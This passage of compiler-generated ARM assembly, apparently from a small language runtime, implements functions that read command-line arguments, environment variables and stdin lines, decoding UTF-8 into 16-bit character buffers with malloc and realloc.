r3, r2, r3 ldr r1, [r3] sub r3, fp, #124 ldmia r3, {r2-r3} str r2, [fp, #-68] str r3, [fp, #-64] str r1, [fp, #-96] ldr r3, [fp, #4] str r3, [fp, #-92] ldr r3, [fp, #8] str r3, [fp, #-88] mov r2, #0 mov r3, #0 str r2, [fp, #-60] str r3, [fp, #-56] ldr r2, [fp, #-68] ldr r3, [fp, #-64] orr r3, r2, r3 cmp r3, #0 moveq r3, #1 movne r3, #0 and r3, r3, #255 cmp r3, #0 beq .L3 mov r3, #0 str r3, [fp, #-84] b .L4 .L3: sub r3, fp, #68 ldmia r3, {r2-r3} str r2, [fp, #-52] str r3, [fp, #-48] ldr r3, [fp, #-52] mov r0, r3 bl malloc mov r3, r0 str r3, [fp, #-80] ldr r3, [fp, #-80] cmp r3, #0 moveq r3, #1 movne r3, #0 and r3, r3, #255 cmp r3, #0 beq .L5 ldr r3, .L25+8 ldr r3, [r3] mov r2, #19 mov r1, #1 ldr r0, .L25+12 bl fwrite mov r0, #1 bl exit .L5: ldr r3, [fp, #-80] str r3, [fp, #-84] .L4: mov r2, #0 mov r3, #0 str r2, [fp, #-44] str r3, [fp, #-40] mov r3, #1 strb r3, [fp, #-101] .L18: ldr r3, [fp, #-44] ldr r2, [fp, #-96] add r3, r2, r3 ldrb r3, [r3] strb r3, [fp, #-100] ldrb r3, [fp, #-100] @ zero_extendqisi2 cmp r3, #0 beq .L24 mov r3, #0 strb r3, [fp, #-99] ldrb r3, [fp, #-100] @ zero_extendqisi2 strh r3, [fp, #-98] @ movhi ldrsb r3, [fp, #-100] cmp r3, #0 blt .L9 mov r3, #1 strb r3, [fp, #-99] b .L10 .L9: ldrb r3, [fp, #-100] @ zero_extendqisi2 and r3, r3, #224 cmp r3, #192 bne .L11 mov r3, #2 strb r3, [fp, #-99] ldr r3, [fp, #-44] add r3, r3, #1 ldr r2, [fp, #-96] add r3, r2, r3 ldrb r3, [r3] strb r3, [fp, #-100] ldrb r3, [fp, #-100] @ zero_extendqisi2 and r3, r3, #192 cmp r3, #128 movne r3, #1 moveq r3, #0 and r3, r3, #255 cmp r3, #0 beq .L12 mov r3, #0 strb r3, [fp, #-101] b .L8 .L12: ldrh r3, [fp, #-98] @ movhi eor r3, r3, #192 strh r3, [fp, #-98] @ movhi ldrh r3, [fp, #-98] @ movhi lsl r3, r3, #6 strh r3, [fp, #-98] @ movhi ldrb r3, [fp, #-100] eor r3, r3, #127 mvn r3, r3 and r3, r3, #255 lsl r3, r3, #16 lsr r2, r3, #16 ldrh r3, [fp, #-98] @ movhi orr r3, r2, r3 strh r3, [fp, #-98] @ movhi b .L10 .L11: ldrb r3, [fp, #-100] @ zero_extendqisi2 and r3, r3, #240 cmp r3, #224 bne .L13 mov r3, #3 strb r3, [fp, #-99] ldr r3, [fp, #-44] add r3, r3, #1 ldr r2, [fp, #-96] add r3, r2, r3 ldrb r3, [r3] strb r3, [fp, #-100] ldrb r3, [fp, #-100] @ zero_extendqisi2 and r3, r3, #192 cmp r3, #128 movne r3, #1 moveq r3, #0 and r3, r3, #255 cmp r3, #0 beq .L14 mov r3, #0 strb r3, [fp, #-101] b .L8 .L14: ldrh r3, [fp, #-98] @ movhi eor r3, r3, #224 strh r3, [fp, #-98] @ movhi ldrh r3, [fp, #-98] @ movhi lsl r3, r3, #6 strh r3, [fp, #-98] @ movhi ldrb r3, [fp, #-100] eor r3, r3, #127 mvn r3, r3 and r3, r3, #255 lsl r3, r3, #16 lsr r2, r3, #16 ldrh r3, [fp, #-98] @ movhi orr r3, r2, r3 strh r3, [fp, #-98] @ movhi ldr r3, [fp, #-44] add r3, r3, #2 ldr r2, [fp, #-96] add r3, r2, r3 ldrb r3, [r3] strb r3, [fp, #-100] ldrb r3, [fp, #-100] @ zero_extendqisi2 and r3, r3, #192 cmp r3, #128 movne r3, #1 moveq r3, #0 and r3, r3, #255 cmp r3, #0 beq .L15 mov r3, #0 strb r3, [fp, #-101] b .L8 .L15: ldrh r3, [fp, #-98] @ movhi lsl r3, r3, #6 strh r3, [fp, #-98] @ movhi ldrb r3, [fp, #-100] eor r3, r3, #127 mvn r3, r3 and r3, r3, #255 lsl r3, r3, #16 lsr r2, r3, #16 ldrh r3, [fp, #-98] @ movhi orr r3, r2, r3 strh r3, [fp, #-98] @ movhi b .L10 .L13: mov r3, #0 strb r3, [fp, #-101] b .L8 .L10: sub r3, fp, #60 ldmia r3, {r2-r3} adds r8, r2, #1 adc r9, r3, #0 str r8, [fp, #-60] str r9, [fp, #-56] sub r3, fp, #60 ldmia r3, {r2-r3} adds r1, r2, r2 str r1, [fp, #-132] adc r3, r3, r3 str r3, [fp, #-128] sub r1, fp, #132 ldmia r1, {r0-r1} sub r3, fp, #68 ldmia r3, {r2-r3} adds r6, r0, r2 adc r7, r1, r3 ldr r3, [fp, #-84] str r3, [fp, #-76] str r6, [fp, #-36] str r7, [fp, #-32] ldr r3, [fp, #-36] mov r1, r3 ldr r0, [fp, #-76] bl realloc str r0, [fp, #-72] ldr r3, [fp, #-72] cmp r3, #0 moveq r3, #1 movne r3, #0 and r3, r3, #255 cmp r3, #0 beq .L16 ldr r3, .L25+8 ldr r3, [r3] mov r2, #19 mov r1, #1 ldr r0, .L25+12 bl fwrite mov r0, #1 bl exit .L16: ldr r3, [fp, #-72] str r3, [fp, #-84] ldr r2, [fp, #-68] ldr r3, [fp, #-60] sub r3, r3, #1 lsl r3, r3, #1 add r3, r2, r3 ldr r2, [fp, #-84] add r3, r2, r3 ldrh r2, [fp, #-98] @ movhi strh r2, [r3] @ movhi ldrb r2, [fp, #-99] @ zero_extendqisi2 mov r3, #0 sub r1, fp, #44 ldmia r1, {r0-r1} adds r4, r0, r2 adc r5, r1, r3 str r4, [fp, #-44] str r5, [fp, #-40] b .L18 .L24: nop .L8: ldrb r3, [fp, #-101] eor r3, r3, #1 and r3, r3, #255 cmp r3, #0 beq .L19 ldr r3, [fp, #-84] cmp r3, #0 beq .L20 ldr r0, [fp, #-84] bl free .L20: mov r3, #0 str r3, [fp, #-84] mov r2, #0 mov r3, #0 str r2, [fp, #-60] str r3, [fp, #-56] .L19: ldr r3, [fp, #-88] ldr r2, [fp, #-84] str r2, [r3] ldr r1, [fp, #-92] sub r3, fp, #60 ldmia r3, {r2-r3} stm r1, {r2-r3} ldrb r3, [fp, #-101] @ zero_extendqisi2 strb r3, [fp, #-102] b .L22 .L2: ldr r1, [fp, #4] mov r2, #0 mov r3, #0 stm r1, {r2-r3} ldr r3, [fp, #8] mov r2, #0 str r2, [r3] .L22: ldrb r3, [fp, #-102] @ zero_extendqisi2 mov r0, r3 sub sp, fp, #28 @ sp needed pop {r4, r5, r6, r7, r8, r9, fp, pc} .L26: .align 2 .L25: .word __argc__ .word __argv__ .word stderr .word .LC0 .size shar__get__cmd__argument, .-shar__get__cmd__argument .align 2 .global shar__get__cmd__arguments__count .syntax unified .arm .fpu softvfp .type shar__get__cmd__arguments__count, %function shar__get__cmd__arguments__count: @ args = 0, pretend = 0, frame = 0 @ frame_needed = 1, uses_anonymous_args = 0 @ link register save eliminated. str fp, [sp, #-4]! add fp, sp, #0 ldr r3, .L29 ldmia r3, {r2-r3} mov r0, r2 mov r1, r3 add sp, fp, #0 @ sp needed ldr fp, [sp], #4 bx lr .L30: .align 2 .L29: .word __argc__ .size shar__get__cmd__arguments__count, .-shar__get__cmd__arguments__count .align 2 .global shar__get__env__variable .syntax unified .arm .fpu softvfp .type shar__get__env__variable, %function shar__get__env__variable: @ args = 16, pretend = 0, frame = 216 @ frame_needed = 1, uses_anonymous_args = 0 push {r4, r5, r6, r7, r8, r9, fp, lr} add fp, sp, #28 sub sp, sp, #216 str r0, [fp, #-196] str r1, [fp, #-192] str r2, [fp, #-200] sub r3, fp, #196 ldmia r3, {r2-r3} str r2, [fp, #-116] str r3, [fp, #-112] ldr r3, [fp, #-200] str r3, [fp, #-168] mov r3, #0 str r3, [fp, #-164] mov r2, #0 mov r3, #0 str r2, [fp, #-108] str r3, [fp, #-104] mov r2, #0 mov r3, #0 str r2, [fp, #-100] str r3, [fp, #-96] mov r2, #0 mov r3, #0 str r2, [fp, #-92] str r3, [fp, #-88] b .L32 .L44: ldr r3, [fp, #-92] lsl r2, r3, #1 ldr r3, [fp, #-168] add r3, r3, r2 ldrh r3, [r3] @ movhi strh r3, [fp, #-180] @ movhi mov r3, #0 strb r3, [fp, #-184] ldrh r3, [fp, #-180] cmp r3, #0 beq .L69 ldrh r3, [fp, #-180] cmp r3, #127 bhi .L35 mov r3, #1 strb r3, [fp, #-184] b .L36 .L35: ldrh r3, [fp, #-180] cmp r3, #2048 bcs .L37 mov r3, #2 strb r3, [fp, #-184] b .L36 .L37: mov r3, #3 strb r3, [fp, #-184] .L36: ldrb r0, [fp, #-184] @ zero_extendqisi2 mov r1, #0 sub r3, fp, #100 ldmia r3, {r2-r3} adds ip, r2, r0 str ip, [fp, #-220] adc r3, r3, r1 str r3, [fp, #-216] sub r3, fp, #220 ldmia r3, {r2-r3} str r2, [fp, #-100] str r3, [fp, #-96] ldr r3, [fp, #-164] str r3, [fp, #-160] sub r3, fp, #100 ldmia r3, {r2-r3} str r2, [fp, #-84] str r3, [fp, #-80] ldr r3, [fp, #-84] mov r1, r3 ldr r0, [fp, #-160] bl realloc str r0, [fp, #-156] ldr r3, [fp, #-156] cmp r3, #0 moveq r3, #1 movne r3, #0 and r3, r3, #255 cmp r3, #0 beq .L38 ldr r3, .L71 ldr r3, [r3] mov r2, #19 mov r1, #1 ldr r0, .L71+4 bl fwrite mov r0, #1 bl exit .L38: ldr r3, [fp, #-156] str r3, [fp, #-164] ldrb r3, [fp, #-184] @ zero_extendqisi2 cmp r3, #3 beq .L40 cmp r3, #3 bgt .L41 cmp r3, #1 beq .L42 cmp r3, #2 beq .L43 b .L41 .L42: ldr r2, [fp, #-108] ldr r3, [fp, #-164] add r2, r3, r2 ldrh r3, [fp, #-180] @ movhi and r3, r3, #255 strb r3, [r2] b .L41 .L43: ldrh r3, [fp, #-180] lsr r3, r3, #6 lsl r3, r3, #16 lsr r3, r3, #16 and r1, r3, #255 ldr r2, [fp, #-108] ldr r3, [fp, #-164] add r2, r3, r2 mvn r3, r1, lsl #26 mvn r3, r3, lsr #26 and r3, r3, #255 strb r3, [r2] ldrh r3, [fp, #-180] @ movhi lsl r3, r3, #24 asr r3, r3, #24 and r3, r3, #63 lsl r3, r3, #24 asr r3, r3, #24 mvn r3, r3, lsl #25 mvn r3, r3, lsr #25 lsl r3, r3, #24 asr r1, r3, #24 ldr r3, [fp, #-108] add r2, r3, #1 ldr r3, [fp, #-164] add r2, r3, r2 and r3, r1, #255 strb r3, [r2] b .L41 .L40: ldrh r3, [fp, #-180] lsr r3, r3, #12 lsl r3, r3, #16 lsr r3, r3, #16 and r1, r3, #255 ldr r2, [fp, #-108] ldr r3, [fp, #-164] add r2, r3, r2 mvn r3, r1, lsl #27 mvn r3, r3, lsr #27 and r3, r3, #255 strb r3, [r2] ldrh r3, [fp, #-180] lsr r3, r3, #6 lsl r3, r3, #16 lsr r3, r3, #16 lsl r3, r3, #24 asr r3, r3, #24 and r3, r3, #63 lsl r3, r3, #24 asr r3, r3, #24 mvn r3, r3, lsl #25 mvn r3, r3, lsr #25 lsl r3, r3, #24 asr r1, r3, #24 ldr r3, [fp, #-108] add r2, r3, #1 ldr r3, [fp, #-164] add r2, r3, r2 and r3, r1, #255 strb r3, [r2] ldrh r3, [fp, #-180] @ movhi lsl r3, r3, #24 asr r3, r3, #24 and r3, r3, #63 lsl r3, r3, #24 asr r3, r3, #24 mvn r3, r3, lsl #25 mvn r3, r3, lsr #25 lsl r3, r3, #24 asr r1, r3, #24 ldr r3, [fp, #-108] add r2, r3, #2 ldr r3, [fp, #-164] add r2, r3, r2 and r3, r1, #255 strb r3, [r2] nop .L41: ldrb r0, [fp, #-184] @ zero_extendqisi2 mov r1, #0 sub r3, fp, #108 ldmia r3, {r2-r3} adds ip, r2, r0 str ip, [fp, #-228] adc r3, r3, r1 str r3, [fp, #-224] sub r3, fp, #228 ldmia r3, {r2-r3} str r2, [fp, #-108] str r3, [fp, #-104] b .L34 .L69: nop .L34: sub r3, fp, #92 ldmia r3, {r2-r3} adds r1, r2, #1 str r1, [fp, #-236] adc r3, r3, #0 str r3, [fp, #-232] sub r3, fp, #236 ldmia r3, {r2-r3} str r2, [fp, #-92] str r3, [fp, #-88] .L32: sub r1, fp, #116 ldmia r1, {r0-r1} sub r3, fp, #92 ldmia r3, {r2-r3} cmp r1, r3 cmpeq r0, r2 bhi .L44 sub r3, fp, #100 ldmia r3, {r2-r3} adds r1, r2, #1 str r1, [fp, #-212] adc r3, r3, #0 str r3, [fp, #-208] ldr r3, [fp, #-164] str r3, [fp, #-152] sub r3, fp, #212 ldmia r3, {r2-r3} str r2, [fp, #-76] str r3, [fp, #-72] ldr r3, [fp, #-76] mov r1, r3 ldr r0, [fp, #-152] bl realloc str r0, [fp, #-148] ldr r3, [fp, #-148] cmp r3, #0 moveq r3, #1 movne r3, #0 and r3, r3, #255 cmp r3, #0 beq .L45 ldr r3, .L71 ldr r3, [r3] mov r2, #19 mov r1, #1 ldr r0, .L71+4 bl fwrite mov r0, #1 bl exit .L45: ldr r3, [fp, #-148] str r3, [fp, #-164] ldr r3, [fp, #-108] ldr r2, [fp, #-164] add r3, r2, r3 mov r2, #0 strb r2, [r3] ldr r3, [fp, #-164] str r3, [fp, #-176] ldr r0, [fp, #-176] bl getenv str r0, [fp, #-172] ldr r0, [fp, #-176] bl free ldr r3, [fp, #-172] cmp r3, #0 bne .L48 ldr r1, [fp, #12] mov r2, #0 mov r3, #0 stm r1, {r2-r3} ldr r3, [fp, #16] mov r2, #0 str r2, [r3] mov r3, #0 b .L49 .L48: ldmib fp, {r2-r3} str r2, [fp, #-68] str r3, [fp, #-64] ldr r3, [fp, #-172] str r3, [fp, #-144] ldr r3, [fp, #12] str r3, [fp, #-140] ldr r3, [fp, #16] str r3, [fp, #-136] mov r2, #0 mov r3, #0 str r2, [fp, #-60] str r3, [fp, #-56] ldr r2, [fp, #-68] ldr r3, [fp, #-64] orr r3, r2, r3 cmp r3, #0 moveq r3, #1 movne r3, #0 and r3, r3, #255 cmp r3, #0 beq .L50 mov r3, #0 str r3, [fp, #-132] b .L51 .L50: sub r3, fp, #68 ldmia r3, {r2-r3} str r2, [fp, #-52] str r3, [fp, #-48] ldr r3, [fp, #-52] mov r0, r3 bl malloc mov r3, r0 str r3, [fp, #-128] ldr r3, [fp, #-128] cmp r3, #0 moveq r3, #1 movne r3, #0 and r3, r3, #255 cmp r3, #0 beq .L52 ldr r3, .L71 ldr r3, [r3] mov r2, #19 mov r1, #1 ldr r0, .L71+4 bl fwrite mov r0, #1 bl exit .L52: ldr r3, [fp, #-128] str r3, [fp, #-132] .L51: mov r2, #0 mov r3, #0 str r2, [fp, #-44] str r3, [fp, #-40] mov r3, #1 strb r3, [fp, #-183] .L65: ldr r3, [fp, #-44] ldr r2, [fp, #-144] add r3, r2, r3 ldrb r3, [r3] strb r3, [fp, #-182] ldrb r3, [fp, #-182] @ zero_extendqisi2 cmp r3, #0 beq .L70 mov r3, #0 strb r3, [fp, #-181] ldrb r3, [fp, #-182] @ zero_extendqisi2 strh r3, [fp, #-178] @ movhi ldrsb r3, [fp, #-182] cmp r3, #0 blt .L56 mov r3, #1 strb r3, [fp, #-181] b .L57 .L56: ldrb r3, [fp, #-182] @ zero_extendqisi2 and r3, r3, #224 cmp r3, #192 bne .L58 mov r3, #2 strb r3, [fp, #-181] ldr r3, [fp, #-44] add r3, r3, #1 ldr r2, [fp, #-144] add r3, r2, r3 ldrb r3, [r3] strb r3, [fp, #-182] ldrb r3, [fp, #-182] @ zero_extendqisi2 and r3, r3, #192 cmp r3, #128 movne r3, #1 moveq r3, #0 and r3, r3, #255 cmp r3, #0 beq .L59 mov r3, #0 strb r3, [fp, #-183] b .L55 .L59: ldrh r3, [fp, #-178] @ movhi eor r3, r3, #192 strh r3, [fp, #-178] @ movhi ldrh r3, [fp, #-178] @ movhi lsl r3, r3, #6 strh r3, [fp, #-178] @ movhi ldrb r3, [fp, #-182] eor r3, r3, #127 mvn r3, r3 and r3, r3, #255 lsl r3, r3, #16 lsr r2, r3, #16 ldrh r3, [fp, #-178] @ movhi orr r3, r2, r3 strh r3, [fp, #-178] @ movhi b .L57 .L58: ldrb r3, [fp, #-182] @ zero_extendqisi2 and r3, r3, #240 cmp r3, #224 bne .L60 mov r3, #3 strb r3, [fp, #-181] ldr r3, [fp, #-44] add r3, r3, #1 ldr r2, [fp, #-144] add r3, r2, r3 ldrb r3, [r3] strb r3, [fp, #-182] ldrb r3, [fp, #-182] @ zero_extendqisi2 and r3, r3, #192 cmp r3, #128 movne r3, #1 moveq r3, #0 and r3, r3, #255 cmp r3, #0 beq .L61 mov r3, #0 strb r3, [fp, #-183] b .L55 .L61: ldrh r3, [fp, #-178] @ movhi eor r3, r3, #224 strh r3, [fp, #-178] @ movhi ldrh r3, [fp, #-178] @ movhi lsl r3, r3, #6 strh r3, [fp, #-178] @ movhi ldrb r3, [fp, #-182] eor r3, r3, #127 mvn r3, r3 and r3, r3, #255 lsl r3, r3, #16 lsr r2, r3, #16 ldrh r3, [fp, #-178] @ movhi orr r3, r2, r3 strh r3, [fp, #-178] @ movhi ldr r3, [fp, #-44] add r3, r3, #2 ldr r2, [fp, #-144] add r3, r2, r3 ldrb r3, [r3] strb r3, [fp, #-182] ldrb r3, [fp, #-182] @ zero_extendqisi2 and r3, r3, #192 cmp r3, #128 movne r3, #1 moveq r3, #0 and r3, r3, #255 cmp r3, #0 beq .L62 mov r3, #0 strb r3, [fp, #-183] b .L55 .L62: ldrh r3, [fp, #-178] @ movhi lsl r3, r3, #6 strh r3, [fp, #-178] @ movhi ldrb r3, [fp, #-182] eor r3, r3, #127 mvn r3, r3 and r3, r3, #255 lsl r3, r3, #16 lsr r2, r3, #16 ldrh r3, [fp, #-178] @ movhi orr r3, r2, r3 strh r3, [fp, #-178] @ movhi b .L57 .L60: mov r3, #0 strb r3, [fp, #-183] b .L55 .L57: sub r3, fp, #60 ldmia r3, {r2-r3} adds r8, r2, #1 adc r9, r3, #0 str r8, [fp, #-60] str r9, [fp, #-56] sub r3, fp, #60 ldmia r3, {r2-r3} adds r1, r2, r2 str r1, [fp, #-244] adc r3, r3, r3 str r3, [fp, #-240] sub r1, fp, #244 ldmia r1, {r0-r1} sub r3, fp, #68 ldmia r3, {r2-r3} adds r6, r0, r2 adc r7, r1, r3 ldr r3, [fp, #-132] str r3, [fp, #-124] str r6, [fp, #-36] str r7, [fp, #-32] ldr r3, [fp, #-36] mov r1, r3 ldr r0, [fp, #-124] bl realloc str r0, [fp, #-120] ldr r3, [fp, #-120] cmp r3, #0 moveq r3, #1 movne r3, #0 and r3, r3, #255 cmp r3, #0 beq .L63 ldr r3, .L71 ldr r3, [r3] mov r2, #19 mov r1, #1 ldr r0, .L71+4 bl fwrite mov r0, #1 bl exit .L63: ldr r3, [fp, #-120] str r3, [fp, #-132] ldr r2, [fp, #-68] ldr r3, [fp, #-60] sub r3, r3, #1 lsl r3, r3, #1 add r3, r2, r3 ldr r2, [fp, #-132] add r3, r2, r3 ldrh r2, [fp, #-178] @ movhi strh r2, [r3] @ movhi ldrb r2, [fp, #-181] @ zero_extendqisi2 mov r3, #0 sub r1, fp, #44 ldmia r1, {r0-r1} adds r4, r0, r2 adc r5, r1, r3 str r4, [fp, #-44] str r5, [fp, #-40] b .L65 .L70: nop .L55: ldrb r3, [fp, #-183] eor r3, r3, #1 and r3, r3, #255 cmp r3, #0 beq .L66 ldr r3, [fp, #-132] cmp r3, #0 beq .L67 ldr r0, [fp, #-132] bl free .L67: mov r3, #0 str r3, [fp, #-132] mov r2, #0 mov r3, #0 str r2, [fp, #-60] str r3, [fp, #-56] .L66: ldr r3, [fp, #-136] ldr r2, [fp, #-132] str r2, [r3] ldr r1, [fp, #-140] sub r3, fp, #60 ldmia r3, {r2-r3} stm r1, {r2-r3} ldrb r3, [fp, #-183] @ zero_extendqisi2 strb r3, [fp, #-185] ldrb r3, [fp, #-185] @ zero_extendqisi2 .L49: mov r0, r3 sub sp, fp, #28 @ sp needed pop {r4, r5, r6, r7, r8, r9, fp, pc} .L72: .align 2 .L71: .word stderr .word .LC0 .size shar__get__env__variable, .-shar__get__env__variable .section .rodata .align 2 .LC1: .word __stack_chk_guard .text .align 2 .global shar__get__string__from__cmd__line .syntax unified .arm .fpu softvfp .type shar__get__string__from__cmd__line, %function shar__get__string__from__cmd__line: @ args = 0, pretend = 0, frame = 424 @ frame_needed = 1, uses_anonymous_args = 0 push {r4, r5, r6, r7, r8, r9, fp, lr} add fp, sp, #28 sub sp, sp, #424 str r0, [fp, #-380] str r1, [fp, #-376] str r2, [fp, #-384] str r3, [fp, #-388] ldr r3, .L108 ldr r3, [r3] str r3, [fp, #-32] mov r3,#0 mov r2, #0 mov r3, #0 str r2, [fp, #-340] str r3, [fp, #-336] ldr r2, [fp, #-380] ldr r3, [fp, #-376] orr r3, r2, r3 cmp r3, #0 moveq r3, #1 movne r3, #0 and r3, r3, #255 cmp r3, #0 beq .L74 mov r3, #0 str r3, [fp, #-360] b .L75 .L74: sub r3, fp, #380 ldmia r3, {r2-r3} str r2, [fp, #-308] str r3, [fp, #-304] ldr r3, [fp, #-308] mov r0, r3 bl malloc mov r3, r0 str r3, [fp, #-352] ldr r3, [fp, #-352] cmp r3, #0 moveq r3, #1 movne r3, #0 and r3, r3, #255 cmp r3, #0 beq .L76 ldr r3, .L108+4 ldr r3, [r3] mov r2, #19 mov r1, #1 ldr r0, .L108+8 bl fwrite mov r0, #1 bl exit .L76: ldr r3, [fp, #-352] str r3, [fp, #-360] .L75: mov r2, #0 mov r3, #0 str r2, [fp, #-332] str r3, [fp, #-328] mov r3, #1 strb r3, [fp, #-365] .L101: sub r2, fp, #288 ldr r3, [fp, #-332] add r3, r2, r3 str r3, [fp, #-356] ldr r3, [fp, #-332] rsb r3, r3, #256 mov r1, r3 ldr r3, .L108+12 ldr r3, [r3] mov r2, r3 ldr r0, [fp, #-356] bl fgets mov r2, r0 ldr r3, [fp, #-356] cmp r3, r2 bne .L78 mov r2, #0 mov r3, #0 str r2, [fp, #-324] str r3, [fp, #-320] mov r2, #0 mov r3, #0 str r2, [fp, #-332] str r3, [fp, #-328] .L95: sub r2, fp, #288 ldr r3, [fp, #-324] add r3, r2, r3 ldrb r3, [r3] strb r3, [fp, #-363] ldrb r3, [fp, #-363] @ zero_extendqisi2 cmp r3, #10 beq .L79 ldrb r3, [fp, #-363] @ zero_extendqisi2 cmp r3, #0 bne .L80 .L79: ldr r3, [fp, #-388] ldr r2, [fp, #-360] str r2, [r3] ldr r1, [fp, #-384] sub r3, fp, #340 ldmia r3, {r2-r3} stm r1, {r2-r3} mov r3, #1 b .L103 .L80: mov r3, #0 strb r3, [fp, #-364] sub r3, fp, #28 sub r2, r3, #332 sub r2, r2, #2 ldrb r3, [fp, #-363] @ zero_extendqisi2 strh r3, [r2] @ movhi sub r3, fp, #360 sub r3, r3, #3 ldrsb r3, [r3] cmp r3, #0 blt .L82 mov r3, #1 strb r3, [fp, #-364] b .L83 .L82: ldrb r3, [fp, #-363] @ zero_extendqisi2 and r3, r3, #224 cmp r3, #192 bne .L84 mov r3, #2 strb r3, [fp, #-364] sub r3, fp, #324 ldmia r3, {r2-r3} cmp r3, #0 cmpeq r2, #255 bne .L85 mov r2, #1 mov r3, #0 str r2, [fp, #-332] str r3, [fp, #-328] b .L86 .L85: sub r3, fp, #324 ldmia r3, {r2-r3} adds r1, r2, #1 str r1, [fp, #-396] adc r3, r3, #0 str r3, [fp, #-392] sub r3, fp, #288 ldr r2, [fp, #-396] add r3, r3, r2 ldrb r3, [r3] strb r3, [fp, #-363] ldrb r3, [fp, #-363] @ zero_extendqisi2 and r3, r3, #192 cmp r3, #128 movne r3, #1 moveq r3, #0 and r3, r3, #255 cmp r3, #0 beq .L87 mov r3, #0 strb r3, [fp, #-365] b .L86 .L87: sub r3, fp, #28 sub r2, r3, #332 sub r2, r2, #2 sub r3, fp, #28 sub r3, r3, #332 sub r3, r3, #2 ldrh r3, [r3] @ movhi eor r3, r3, #192 strh r3, [r2] @ movhi sub r3, fp, #28 sub r2, r3, #332 sub r2, r2, #2 sub r3, fp, #28 sub r3, r3, #332 sub r3, r3, #2 ldrh r3, [r3] @ movhi lsl r3, r3, #6 strh r3, [r2] @ movhi ldrb r3, [fp, #-363] eor r3, r3, #127 mvn r3, r3 and r3, r3, #255 lsl r3, r3, #16 lsr r1, r3, #16 sub r3, fp, #28 sub r2, r3, #332 sub r2, r2, #2 sub r3, fp, #28 sub r3, r3, #332 sub r3, r3, #2 ldrh r3, [r3] @ movhi orr r3, r1, r3 strh r3, [r2] @ movhi b .L83 .L84: ldrb r3, [fp, #-363] @ zero_extendqisi2 and r3, r3, #240 cmp r3, #224 bne .L88 mov r3, #3 strb r3, [fp, #-364] sub r3, fp, #324 ldmia r3, {r2-r3} cmp r3, #0 cmpeq r2, #253 bls .L89 mov r0, #256 mov r1, #0 sub r3, fp, #324 ldmia r3, {r2-r3} subs r8, r0, r2 sbc r9, r1, r3 str r8, [fp, #-332] str r9, [fp, #-328] b .L86 .L89: sub r3, fp, #324 ldmia r3, {r2-r3} adds r1, r2, #1 str r1, [fp, #-404] adc r3, r3, #0 str r3, [fp, #-400] sub r3, fp, #288 ldr r2, [fp, #-404] add r3, r3, r2 ldrb r3, [r3] strb r3, [fp, #-363] ldrb r3, [fp, #-363] @ zero_extendqisi2 and r3, r3, #192 cmp r3, #128 movne r3, #1 moveq r3, #0 and r3, r3, #255 cmp r3, #0 beq .L90 mov r3, #0 strb r3, [fp, #-365] b .L86 .L90: sub r3, fp, #28 sub r2, r3, #332 sub r2, r2, #2 sub r3, fp, #28 sub r3, r3, #332 sub r3, r3, #2 ldrh r3, [r3] @ movhi eor r3, r3, #224 strh r3, [r2] @ movhi sub r3, fp, #28 sub r2, r3, #332 sub r2, r2, #2 sub r3, fp, #28 sub r3, r3, #332 sub r3, r3, #2 ldrh r3, [r3] @ movhi lsl r3, r3, #6 strh r3, [r2] @ movhi ldrb r3, [fp, #-363] eor r3, r3, #127 mvn r3, r3 and r3, r3, #255 lsl r3, r3, #16 lsr r1, r3, #16 sub r3, fp, #28 sub r2, r3, #332 sub r2, r2, #2 sub r3, fp, #28 sub r3, r3, #332 sub r3, r3, #2 ldrh r3, [r3] @ movhi orr r3, r1, r3 strh r3, [r2] @ movhi sub r3, fp, #324 ldmia r3, {r2-r3} adds r1, r2, #2 str r1, [fp, #-412] adc r3, r3, #0 str r3, [fp, #-408] sub r3, fp, #288 ldr r2, [fp, #-412] add r3, r3, r2 ldrb r3, [r3] strb r3, [fp, #-363] ldrb r3, [fp, #-363] @ zero_extendqisi2 and r3, r3, #192 cmp r3, #128 movne r3, #1 moveq r3, #0 and r3, r3, #255 cmp r3, #0 beq .L91 mov r3, #0 strb r3, [fp, #-365] b .L86 .L91: sub r3, fp, #28 sub r2, r3, #332 sub r2, r2, #2 sub r3, fp, #28 sub r3, r3, #332 sub r3, r3, #2 ldrh r3, [r3] @ movhi lsl r3, r3, #6 strh r3, [r2] @ movhi ldrb r3, [fp, #-363] eor r3, r3, #127 mvn r3, r3 and r3, r3, #255 lsl r3, r3, #16 lsr r1, r3, #16 sub r3, fp, #28 sub r2, r3, #332 sub r2, r2, #2 sub r3, fp, #28 sub r3, r3, #332 sub r3, r3, #2 ldrh r3, [r3] @ movhi orr r3, r1, r3 strh r3, [r2] @ movhi b .L83 .L88: mov r3, #0 strb r3, [fp, #-365] b .L86 .L83: ldrb r0, [fp, #-364] @ zero_extendqisi2 mov r1, #0 sub r3, fp, #324 ldmia r3, {r2-r3} adds ip, r2, r0 str ip, [fp, #-436] adc r3, r3, r1 str r3, [fp, #-432] sub r3, fp, #436 ldmia r3, {r2-r3} str r2, [fp, #-324] str r3, [fp, #-320] sub r3, fp, #340 ldmia r3, {r2-r3} adds r1, r2, #1 str r1, [fp, #-444] adc r3, r3, #0 str r3, [fp, #-440] sub r3, fp, #444 ldmia r3, {r2-r3} str r2, [fp, #-340] str r3, [fp, #-336] sub r3, fp, #340 ldmia r3, {r2-r3} adds r1, r2, r2 str r1, [fp, #-452] adc r3, r3, r3 str r3, [fp, #-448] sub r1, fp, #452 ldmia r1, {r0-r1} sub r3, fp, #380 ldmia r3, {r2-r3} adds ip, r0, r2 str ip, [fp, #-420] adc r3, r1, r3 str r3, [fp, #-416] ldr r3, [fp, #-360] str r3, [fp, #-348] sub r3, fp, #420 ldmia r3, {r2-r3} str r2, [fp, #-300] str r3, [fp, #-296] ldr r3, [fp, #-300] mov r1, r3 ldr r0, [fp, #-348] bl realloc str r0, [fp, #-344] ldr r3, [fp, #-344] cmp r3, #0 moveq r3, #1 movne r3, #0 and r3, r3, #255 cmp r3, #0 beq .L92 ldr r3, .L108+4 ldr r3, [r3] mov r2, #19 mov r1, #1 ldr r0, .L108+8 bl fwrite mov r0, #1 bl exit .L92: ldr r3, [fp, #-344] str r3, [fp, #-360] ldr r2, [fp, #-380] ldr r3, [fp, #-340] sub r3, r3, #1 lsl r3, r3, #1 add r2, r2, r3 ldr r3, [fp, #-360] add r2, r3, r2 sub r3, fp, #28 sub r3, r3, #332 sub r3, r3, #2 ldrh r3, [r3] @ movhi strh r3, [r2] @ movhi sub r3, fp, #324 ldmia r3, {r2-r3} cmp r3, #0 cmpeq r2, #256 beq .L106 b .L95 .L106: nop .L86: ldrb r3, [fp, #-365] eor r3, r3, #1 and r3, r3, #255 cmp r3, #0 bne .L107 mov r2, #0 mov r3, #0 